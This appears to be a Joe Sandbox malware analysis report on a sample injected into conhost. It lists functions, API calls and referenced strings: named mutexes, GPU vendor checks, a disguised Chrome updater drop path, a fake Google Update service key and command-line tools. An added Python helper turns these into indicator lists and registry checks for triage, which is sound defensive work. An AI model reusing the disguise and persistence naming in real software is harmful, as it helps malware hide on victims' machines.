                                                                    • Snapshot File: hcaresult_36_2_140000000_conhost.jbxd
                                                                    Similarity
                                                                    • API ID: wcslen$memset$wcscatwcscpywcsncmp
                                                                    • String ID: 0$X$\BaseNamedObjects\vazasxarlpknfxrw$`
                                                                    • API String ID: 780471329-3676218624
                                                                    • Opcode ID: b56d83db8cdb47bce62b63e0037989871a34e5e5dd9058d4d1577b6850bedc45
                                                                    • Instruction ID: bd1111813274a2185e4a5405d25f62c07457be827839ad4c247fbb5e796227d6
                                                                    • Opcode Fuzzy Hash: b56d83db8cdb47bce62b63e0037989871a34e5e5dd9058d4d1577b6850bedc45
                                                                    • Instruction Fuzzy Hash: FA1259B2618B8481E762CB1AF8443EA77A4F789794F418215EBAC57BF5DF78C189C700
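
Added triage example for the two String ID lists above (the function at 0x1400027d0 and the function listed immediately before it). This is editor-supplied Python, not code from Joe Sandbox or from the sample. It assumes the report's `$` separator never occurs inside an individual string, which holds for these two lines. The display-adapters setup-class GUID and the ImagePath/Start/ProviderName value names are general Windows facts rather than report content, and the recursive ProviderName query is an inference from the vendor strings and the class key appearing together, not a traced API call.

```python
"""Triage helper added to this report page (not Joe Sandbox code): parse the
'$'-joined String ID lists of the two functions above into a hunting list."""
from collections import defaultdict

# Constructed input: the two String ID lines exactly as printed in the report.
# Joe Sandbox joins every string a function references with '$'. The parser
# assumes no single string contains a '$' itself, which holds for these lines.
STRING_ID_LINES = [
    r"$ $AMD$ATI$Advanced Micro Devices$ImagePath$NVIDIA$PROGRAMDATA=$ProviderName"
    r"$SYSTEMROOT=$Start$\??\$\??\$\BaseNamedObjects\bzoteldvymki"
    r"$\BaseNamedObjects\paiwqsbipblamcnmtpdktrir$\BaseNamedObjects\vazasxarlpknfxrw"
    r"$\Google\Chrome\updater.exe$\Registry\Machine\SYSTEM\CurrentControlSet\Control\Class"
    r"\{4d36e968-e325-11ce-bfc1-08002be10318}\$\Registry\Machine\SYSTEM\CurrentControlSet"
    r"\Services\GoogleUpdateTaskMachineQC$\System32$\WindowsPowerShell\v1.0\powershell.exe"
    r"$\cmd.exe$\reg.exe$\sc.exe",
    r"0$X$\BaseNamedObjects\vazasxarlpknfxrw$`",
]

# Known Windows constants (not from the report): the setup-class GUID for
# 'Display adapters', and the service/driver registry value names seen above.
DISPLAY_ADAPTER_CLASS = "{4d36e968-e325-11ce-bfc1-08002be10318}"
GPU_VENDOR_MARKERS = {"AMD", "ATI", "Advanced Micro Devices", "NVIDIA"}
REG_VALUE_NAMES = {"ImagePath", "Start", "ProviderName"}
NAMED_OBJECT_PREFIX = "\\BaseNamedObjects\\"
NT_HKLM_PREFIX = "\\Registry\\Machine\\"
LOLBINS = {"powershell.exe", "cmd.exe", "reg.exe", "sc.exe"}


def split_string_id(line: str) -> list[str]:
    """Split one Joe Sandbox String ID list; empty and whitespace-only entries are dropped."""
    return [s for s in line.split("$") if s.strip()]


def nt_path_to_hklm(path: str) -> str:
    """Rewrite a kernel-style \\Registry\\Machine\\... key into the HKLM\\... spelling
    that reg.exe and PowerShell's Get-ItemProperty accept; other paths pass through."""
    if path.startswith(NT_HKLM_PREFIX):
        return "HKLM\\" + path[len(NT_HKLM_PREFIX):].rstrip("\\")
    return path


def classify(strings: list[str]) -> dict[str, list[str]]:
    """Bucket the strings by how a responder would use them, deduplicating in order."""
    buckets: dict[str, list[str]] = defaultdict(list)
    for s in strings:
        if s.startswith(NAMED_OBJECT_PREFIX):
            buckets["named_objects"].append(s[len(NAMED_OBJECT_PREFIX):])
        elif s.startswith(NT_HKLM_PREFIX):
            buckets["registry_keys"].append(nt_path_to_hklm(s))
        elif s.lower().endswith(".exe"):
            name = s.rsplit("\\", 1)[-1].lower()
            buckets["lolbins" if name in LOLBINS else "payload_paths"].append(s)
        elif s in GPU_VENDOR_MARKERS:
            buckets["gpu_vendor_markers"].append(s)
        elif s in REG_VALUE_NAMES:
            buckets["registry_value_names"].append(s)
        elif s.endswith("="):
            buckets["env_var_prefixes"].append(s[:-1])
        else:
            buckets["other"].append(s)
    return {k: list(dict.fromkeys(v)) for k, v in buckets.items()}


def reg_query_commands(buckets: dict[str, list[str]]) -> list[str]:
    """reg.exe commands to confirm the registry indicators on a suspect host.
    For a Services\\ key the ImagePath is what to compare against the dropped
    \\Google\\Chrome\\updater.exe path; for the Display adapters class the
    recursive ProviderName query reproduces what the sample's vendor-string
    check appears to read (an inference from the strings, not a traced call)."""
    cmds = []
    for key in buckets.get("registry_keys", []):
        if "\\Services\\" in key:
            cmds.append(f'reg query "{key}" /v ImagePath')
        elif key.endswith(DISPLAY_ADAPTER_CLASS):
            cmds.append(f'reg query "{key}" /s /v ProviderName')
    return cmds


def build_hunt(lines: list[str]) -> dict:
    """Full pipeline: merge all String ID lines, classify, and emit host checks."""
    strings = [s for line in lines for s in split_string_id(line)]
    buckets = classify(strings)
    return {**buckets, "reg_queries": reg_query_commands(buckets)}


if __name__ == "__main__":
    for category, items in build_hunt(STRING_ID_LINES).items():
        print(f"{category}:")
        for item in items:
            print(f"  {item}")
```

Running the block offline prints each bucket; the two reg.exe lines are meant to be pasted into an elevated prompt on a suspect host, where the ImagePath of the GoogleUpdateTaskMachineQC service can be compared with the \Google\Chrome\updater.exe drop path that appears in the same string list. The three named objects can be looked for under \BaseNamedObjects with Sysinternals WinObj or handle.exe.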

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000024.00000002.3248255656.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                    • Associated: 00000024.00000002.3248231403.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                    • Associated: 00000024.00000002.3248288460.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                                    • Associated: 00000024.00000002.3248349670.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                                                    • Associated: 00000024.00000002.3248369050.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_36_2_140000000_conhost.jbxd
                                                                    Similarity
                                                                    • API ID: malloc$ExceptionFilterSleepUnhandled_amsg_exit_cexit_inittermmemcpystrlen
                                                                    • String ID:
                                                                    • API String ID: 2643109117-0
                                                                    • Opcode ID: d1db83e79def031ab80d1deba41aed6449390b13d4d6d748f75fc006707f133e
                                                                    • Instruction ID: 4457a89b35f4aef33ffd38620d4ede58944eca37ecfc9223689a444f894f5de4
                                                                    • Opcode Fuzzy Hash: d1db83e79def031ab80d1deba41aed6449390b13d4d6d748f75fc006707f133e
                                                                    • Instruction Fuzzy Hash: 855101F1615A4485FA16EF27F9947EA27A1BB8C7D0F449125FB4D873B2DF3884958300

                                                                    Control-flow Graph

                                                                    • Function 0x140001ba0 (basic blocks 0x140001ba0-0x140001d38): calls VirtualQuery, VirtualProtect, memcpy and GetLastError, plus internal routines 0x140001d40, 0x1400023b0 and 0x1400024d0
                                                                    APIs
                                                                    • VirtualQuery.KERNEL32(?,?,?,?,0000000140007E68,0000000140007E68,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001C63
                                                                    • VirtualProtect.KERNEL32(?,?,?,?,0000000140007E68,0000000140007E68,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001CC7
                                                                    • memcpy.MSVCRT ref: 0000000140001CE0
                                                                    • GetLastError.KERNEL32(?,?,?,?,0000000140007E68,0000000140007E68,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001D23
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000024.00000002.3248255656.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                    • Associated: 00000024.00000002.3248231403.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                    • Associated: 00000024.00000002.3248288460.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                                    • Associated: 00000024.00000002.3248349670.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                                                    • Associated: 00000024.00000002.3248369050.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_36_2_140000000_conhost.jbxd
                                                                    Similarity
                                                                    • API ID: Virtual$ErrorLastProtectQuerymemcpy
                                                                    • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
                                                                    • API String ID: 2595394609-2123141913
                                                                    • Opcode ID: 2a584a706622e52ade0fcab731ee33d1777f307b9fa9d7d0bf991f3a34367caa
                                                                    • Instruction ID: 1161044a75eb1e7cd09bc24417fd150d5724ba9878afa94a0ebc1ae4739ba328
                                                                    • Opcode Fuzzy Hash: 2a584a706622e52ade0fcab731ee33d1777f307b9fa9d7d0bf991f3a34367caa
                                                                    • Instruction Fuzzy Hash: 0F4132B1201A4486FA26DF57F884BE927A0F78DBC4F554126EF0E877B1DA38C586C700

                                                                    Control-flow Graph

                                                                    • Function 0x140002104 (basic blocks 0x140002104-0x140002280): calls EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, TlsGetValue, GetLastError and free
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000024.00000002.3248255656.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                    • Associated: 00000024.00000002.3248231403.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                    • Associated: 00000024.00000002.3248288460.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                                    • Associated: 00000024.00000002.3248349670.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                                                    • Associated: 00000024.00000002.3248369050.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_36_2_140000000_conhost.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalSection$DeleteEnterErrorLastLeaveValuefree
                                                                    • String ID:
                                                                    • API String ID: 3326252324-0
                                                                    • Opcode ID: bcf1c14129559fff498e2fab62ae5e52fccf0f5f2b7621f1284fde4cab1a4794
                                                                    • Instruction ID: e3a015b4a75ce14096daf75d7f598576e46144e8d1edeea3fbfa6c29d12a9d61
                                                                    • Opcode Fuzzy Hash: bcf1c14129559fff498e2fab62ae5e52fccf0f5f2b7621f1284fde4cab1a4794
                                                                    • Instruction Fuzzy Hash: 8021B3B1305A11D2FA6BDB53F9583E82364BB6CBD0F444121FF5A576B4DB798986C300

                                                                    Control-flow Graph

                                                                    • Function 0x140001e10 (basic blocks 0x140001e10-0x140001f69): calls signal at three sites, plus internal routine 0x140006c40
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000024.00000002.3248255656.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                    • Associated: 00000024.00000002.3248231403.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                    • Associated: 00000024.00000002.3248288460.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                                    • Associated: 00000024.00000002.3248349670.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                                                    • Associated: 00000024.00000002.3248369050.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_36_2_140000000_conhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: CCG
                                                                    • API String ID: 0-1584390748
                                                                    • Opcode ID: dd8133f626706b62a136801e6f14d89df3933c56dad94dca13a3ea9b55e7724d
                                                                    • Instruction ID: 3456a1c84c2a53dd5aa6e48d6b89ab24717cda018660fff4778c7de244838e1d
                                                                    • Opcode Fuzzy Hash: dd8133f626706b62a136801e6f14d89df3933c56dad94dca13a3ea9b55e7724d
                                                                    • Instruction Fuzzy Hash: 5E214CB1B4150542FA7BDA2BF5903F91192ABCC7E4F258535FF5A473F5DE3888828241

                                                                    Control-flow Graph

                                                                    • Function 0x140001880 (basic blocks 0x140001880-0x140001b98): calls VirtualProtect, plus internal routines 0x140001ba0, 0x140001d40, 0x140002420 and 0x140002660
                                                                    APIs
                                                                    • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000140001247), ref: 00000001400019F9
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000024.00000002.3248255656.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                    • Associated: 00000024.00000002.3248231403.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                    • Associated: 00000024.00000002.3248288460.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                                    • Associated: 00000024.00000002.3248349670.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                                                    • Associated: 00000024.00000002.3248369050.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_36_2_140000000_conhost.jbxd
                                                                    Similarity
                                                                    • API ID: ProtectVirtual
                                                                    • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
                                                                    • API String ID: 544645111-395989641
                                                                    • Opcode ID: a89914c2fd02570a4e6521a208eebb3515e1225b41bbed0033c188a81e2debbf
                                                                    • Instruction ID: 7b3573af97f4a1eacab2cf6b7141f308442550d87ff31978870e308cef0d76bf
                                                                    • Opcode Fuzzy Hash: a89914c2fd02570a4e6521a208eebb3515e1225b41bbed0033c188a81e2debbf
                                                                    • Instruction Fuzzy Hash: 265105B6B11544DAEB12CF67F840BD82761A759BE8F548211FB19077B4DB38C586C700

                                                                    Control-flow Graph

                                                                    • Function 0x140001800 (basic blocks 0x140001800-0x140001867): calls fprintf, plus internal routine 0x140002290
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000024.00000002.3248255656.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                    • Associated: 00000024.00000002.3248231403.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                    • Associated: 00000024.00000002.3248288460.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                                    • Associated: 00000024.00000002.3248349670.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                                                    • Associated: 00000024.00000002.3248369050.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_36_2_140000000_conhost.jbxd
                                                                    Similarity
                                                                    • API ID: fprintf
                                                                    • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                    • API String ID: 383729395-3474627141
                                                                    • Opcode ID: eb152ed10c2c1a9f974652424f988c556df87c33465b9ce34772e34cbd9d02d8
                                                                    • Instruction ID: f616287742e50a73d89ee1abed936dc904873cdc8678ebe312197a385c6e0082
                                                                    • Opcode Fuzzy Hash: eb152ed10c2c1a9f974652424f988c556df87c33465b9ce34772e34cbd9d02d8
                                                                    • Instruction Fuzzy Hash: 71F06271A14A4482E612EB6AB9417E96361E75D7C1F509221FF4DA76A2DF38D1828310

                                                                    Control-flow Graph

                                                                    • Function 0x14000219e (basic blocks 0x14000219e-0x140002280): calls EnterCriticalSection, LeaveCriticalSection, TlsGetValue and GetLastError
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000024.00000002.3248255656.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                    • Associated: 00000024.00000002.3248231403.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                    • Associated: 00000024.00000002.3248288460.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                                    • Associated: 00000024.00000002.3248349670.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                                                    • Associated: 00000024.00000002.3248369050.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_36_2_140000000_conhost.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalSection$EnterErrorLastLeaveValue
                                                                    • String ID:
                                                                    • API String ID: 682475483-0
                                                                    • Opcode ID: 75c239d6f9b1b05cd32b51954dacabd1d99c2907a8b4144d0770202a5cd4097e
                                                                    • Instruction ID: 57be894ec6e479b01b3bdbc431c3049754870fdb45279c41188df5f75f20f987
                                                                    • Opcode Fuzzy Hash: 75c239d6f9b1b05cd32b51954dacabd1d99c2907a8b4144d0770202a5cd4097e
                                                                    • Instruction Fuzzy Hash: 2F01B6B5305A0192FA5BDB53FD083D86364BB6CBD1F854021EF09536B4DB75C996C300